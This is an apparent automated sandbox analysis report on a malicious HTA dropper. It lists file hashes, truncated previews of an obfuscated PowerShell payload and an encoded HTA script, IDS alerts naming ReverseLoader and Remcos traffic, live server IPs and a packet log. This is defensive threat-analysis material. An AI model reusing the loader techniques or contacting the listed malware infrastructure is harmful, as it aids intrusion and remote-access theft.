                                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fMs+zxs7+AEszI923fM1A:p37Lvkmb6KzcWZE2uA
                                                                                                                MD5:7268327D8E67B4AD3E32E1C1168C6F5C
                                                                                                                SHA1:4E2F8E715F6C22CCB0FF7156C452D020D5F4EB96
                                                                                                                SHA-256:22841F27ACEA54A187D64310243C0B61925A949A80F7E3868B3365EB42B2EACD
                                                                                                                SHA-512:13F3BEF69EAE7029912C56E5CB54A9E527C570DADEADFF4BD32B1792A50C669041E2E785477EDC21E4FBE0D5F82DC28E14888F0F036C3D3FABC3A15ED966D4DA
                                                                                                                Malicious:true
                                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.0.cs"
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3072
                                                                                                                Entropy (8bit):2.784940084245893
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:etGSMJWJ+l8mMH1kLNyjwatkZf4pSpPWI+ycuZhN6DjakSdDsPNnqI:6jc+mMjcNJ4pk+1ul6Dja3dD8qI
                                                                                                                MD5:1072639FB072A906BB4FE1640C0697E7
                                                                                                                SHA1:CC40767754B40EC4756AB5933201208DBA04C80B
                                                                                                                SHA-256:833D8FEC13004C9A239B4B5F640FDEC2FDE077BA0B667C61C9963CE15A73F3D5
                                                                                                                SHA-512:C05B2B2EF1E5D67F09A9FC2199106245AB1ABFBA6C2AF0E5CB5708CAEA0401CE74B8E2C9256C0DD8DB9F0D96DF97920F9B33835BAE5171B5D142D24FD22EA9DD
                                                                                                                Malicious:false
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._g...........!.................#... ...@....... ....................................@.................................H#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................/.(.....d.....d.......................................... 6.....P ......H.........N.....V.....Z.....].....`...H.....H...!.H.....H.......!.....*.......6..................................................<Module>.br
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):870
                                                                                                                Entropy (8bit):5.312681071106441
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:KMoqd3ka6KzNE28Kax5DqBVKVrdFAMBJTH:doika6aNE28K2DcVKdBJj
                                                                                                                MD5:ADF9F13D34016E4A206C47CB6AFA5522
                                                                                                                SHA1:42848D13581E063494871AD63348098D82D9000F
                                                                                                                SHA-256:82BEBF16B80441A56CF97ABA9B384C3C05A57C7D2208227EDEB2D0024D92D044
                                                                                                                SHA-512:09DA7B8920F7B03B2E1874F626A272EB1A37CB1D1EDE5C55F1EE0E96CE7FB8C5340F05A3A2E04545CE54C70C80F6D7F9989F4A912C9D414E77067AF48B500BC2
                                                                                                                Malicious:false
                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (3315), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):154110
                                                                                                                Entropy (8bit):3.799082402432702
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:p+SH9rw84JFFSOKuW5kYOGto+SH9rw84JFFSOKuW5kYOr+SH9rw84JFFSOKuW5kq:/1457SzOGtM1457SzOF1457SzO4
                                                                                                                MD5:86DB247A20761FD6B7EF9EF0B3151DD1
                                                                                                                SHA1:FBD741B0283BAB0DDD1AE638FFA4DB3732E18211
                                                                                                                SHA-256:D1932467C3580FF9A99F7A9A6408D2C050A4DDDE46CCE7105E557A230080117C
                                                                                                                SHA-512:EE894328D447C348C7F8288B07EE9C668FD3AD4951F0B64443C7B5D62B41E6DA24389D8DF9799BDBA30620279C11CA55C0658722F97240480C540B3FCF2ED866
                                                                                                                Malicious:true
                                                                                                                Preview:...... . . . .....n.a.L.k.b.i.G.i.W.i.B.Z.f.k.z. .=. .".K.h.L.L.Z.i.x.h.i.i.L.f.G.G.A.".....i.W.U.T.e.W.W.G.d.Q.W.W.L.L.h. .=. .".L.s.U.c.k.p.b.L.L.m.U.d.p.b.n.".....c.j.G.e.o.W.h.K.P.U.a.Z.v.W.i. .=. .".W.G.o.o.K.c.W.f.G.W.h.n.p.z.N.".........o.U.c.G.K.P.a.a.o.G.G.a.N.u.K. .=. .".h.b.z.k.i.u.Z.L.e.f.b.a.R.z.k.".....z.p.T.z.G.m.Z.R.x.K.K.P.Q.d.P. .=. .".G.l.L.k.C.m.n.k.G.C.p.B.W.L.W.".....x.L.o.x.i.z.e.i.U.a.L.l.z.W.C. .=. .".G.c.x.K.B.W.i.k.A.e.k.m.G.C.o.".....n.R.G.G.K.i.G.A.P.N.U.i.a.c.f. .=. .".p.O.G.i.G.G.T.P.h.W.k.Z.T.i.L.".....W.u.b.G.q.h.P.i.L.K.c.K.q.v.T. .=. .".s.A.Z.c.l.s.P.d.h.i.k.i.W.s.H.".....W.S.W.W.p.l.W.G.c.G.N.K.g.e.f. .=. .".T.n.I.O.Z.L.c.i.z.f.U.x.R.q.z.".....U.Z.N.v.W.p.G.C.l.z.W.Q.l.W.H. .=. .".m.L.K.G.N.Q.G.h.Z.d.L.k.K.W.B.".....Z.i.m.i.W.G.K.W.q.i.e.H.Q.a.W. .=. .".L.z.W.q.Z.z.B.L.U.o.z.C.Q.n.k.".....K.p.c.O.N.m.h.W.I.n.m.G.x.t.Z. .=. .".k.L.N.N.p.A.o.z.m.z.P.p.z.p.q.".....P.G.a.R.u.C.K.q.W.m.i.k.L.n.L. .=. .".s.P.K.L.G.v.U.i.l.U.U.L.C.m.m.".....W.W.J.r.B.G.a.U.
                                                                                                                File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                                Entropy (8bit):2.74053989177969
                                                                                                                TrID:
                                                                                                                  File name:givenbestupdatedoingformebestthingswithgreatnewsformegive.hta
                                                                                                                  File size:147'517 bytes
                                                                                                                  MD5:f1c8937918d65456c0565dc023e48210
                                                                                                                  SHA1:487a5ff34609e3aaa41a1d7a92f3705f377ab31b
                                                                                                                  SHA256:32f32787e8bbc5276d6f9d1d1d8b0f5f762b33df9abf8a820f34d6e702603b99
                                                                                                                  SHA512:6f4e87018f6e4009f462691c57ab9f08e6b84b1b0d4cab58ffc2e8472bf78a01e4e0374c29d5c1745a6d4b6123022fe5c46dd4a4872204fb4e54867f4ace963f
                                                                                                                  SSDEEP:768:t1E5YUGhum2oum2mS5KUJDVUKhCAGVf/AqYhASOA/lbkaRqqwS5z6Yr7CAtu48Zj:tf
                                                                                                                  TLSH:ACE36717C49BE838A7B7AEBFF71C7A3A52426D0FE88945DF0A5C85900EE15C67324D84
                                                                                                                  File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-16T07:15:01.460433+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.549704192.3.122.15980TCP
                                                                                                                  2024-12-16T07:15:31.417407+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.549742104.21.84.67443TCP
                                                                                                                  2024-12-16T07:15:31.827927+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.549742TCP
                                                                                                                  2024-12-16T07:15:31.827927+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.549742TCP
                                                                                                                  2024-12-16T07:15:32.789791+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.549742TCP
                                                                                                                  2024-12-16T07:15:34.509348+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549753107.173.143.3114646TCP
                                                                                                                  2024-12-16T07:15:36.634309+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549759107.173.143.3114646TCP
                                                                                                                  2024-12-16T07:15:36.888217+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549760178.237.33.5080TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 16, 2024 07:15:00.233767033 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:00.354140997 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:00.354227066 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:00.354363918 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:00.474591970 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460316896 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460383892 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460433006 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.460457087 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460473061 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460489988 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460505009 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460520029 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460527897 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460535049 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460546970 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.460546970 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.460566044 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.460582018 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.460582018 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.460622072 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.581423044 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.581506968 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.581554890 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.581659079 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.652282953 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.652391911 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.652425051 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.652508020 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.656408072 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.656481981 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.656538963 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.656599045 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.664856911 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.664920092 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.664973021 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.665040970 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.673240900 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.673311949 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.673376083 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.673433065 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.681617975 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.681684971 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.681760073 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.681821108 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.690066099 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.690129995 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.690144062 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.690201998 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.698451042 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.698554039 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.698580980 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.698646069 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.706841946 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.706907034 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.706964016 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.707019091 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.715250969 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.715337038 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.715408087 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.715465069 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.723685026 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.723747015 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.723798037 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.723870993 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.731354952 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.731420040 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.731435061 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.731470108 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.844429970 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.844495058 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.844516993 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.844558954 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.848223925 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.848288059 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.848346949 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.848398924 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.855927944 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.856010914 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.856067896 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.856132984 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.863609076 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.863670111 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.863802910 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.863867998 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.871301889 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.871396065 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.871426105 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.871496916 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.879004002 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.879081011 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.879137039 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.879190922 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.886707067 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.886775017 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.886828899 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.886878967 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.894462109 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.894515991 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.894572020 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.898343086 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.902129889 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.902201891 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.902270079 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.902323961 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.909851074 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.909909964 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.909976959 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.910027981 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.915853977 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.915920973 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.915977001 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.916030884 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.922022104 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.922087908 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.922132969 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.922214031 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.927989960 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.928064108 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.928126097 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.928195953 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.934125900 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.934191942 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.934220076 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.934290886 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.940104008 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.940171957 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.940234900 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.940289974 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:01.946177959 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:01.946245909 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.036458969 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.036550045 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.036581993 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.036613941 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.039222002 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.039288044 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.039376020 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.039449930 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.044872999 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.044959068 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.045026064 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.045095921 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.050585985 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.050666094 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.050723076 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.050776958 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.056318045 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.056376934 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.056400061 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.056463003 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.061815977 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.061883926 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.061988115 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.062047958 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.067354918 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.067411900 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.067485094 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.067553043 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.072824955 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.072892904 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.072951078 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.073019981 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.078383923 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.078460932 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.078489065 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.078560114 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.083903074 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.083973885 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.084032059 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.084085941 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.089396954 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.089469910 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.089525938 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.089601040 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.094866991 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.094929934 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.094993114 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.095062971 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.100414991 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.100488901 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.100554943 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.100631952 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.105335951 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.105398893 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.105413914 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.105464935 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.110052109 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.110114098 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.110172033 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.110224009 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.114898920 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.114969969 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.115036011 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.115103960 CET4970480192.168.2.5192.3.122.159
                                                                                                                  Dec 16, 2024 07:15:02.119762897 CET8049704192.3.122.159192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:02.119860888 CET4970480192.168.2.5192.3.122.159
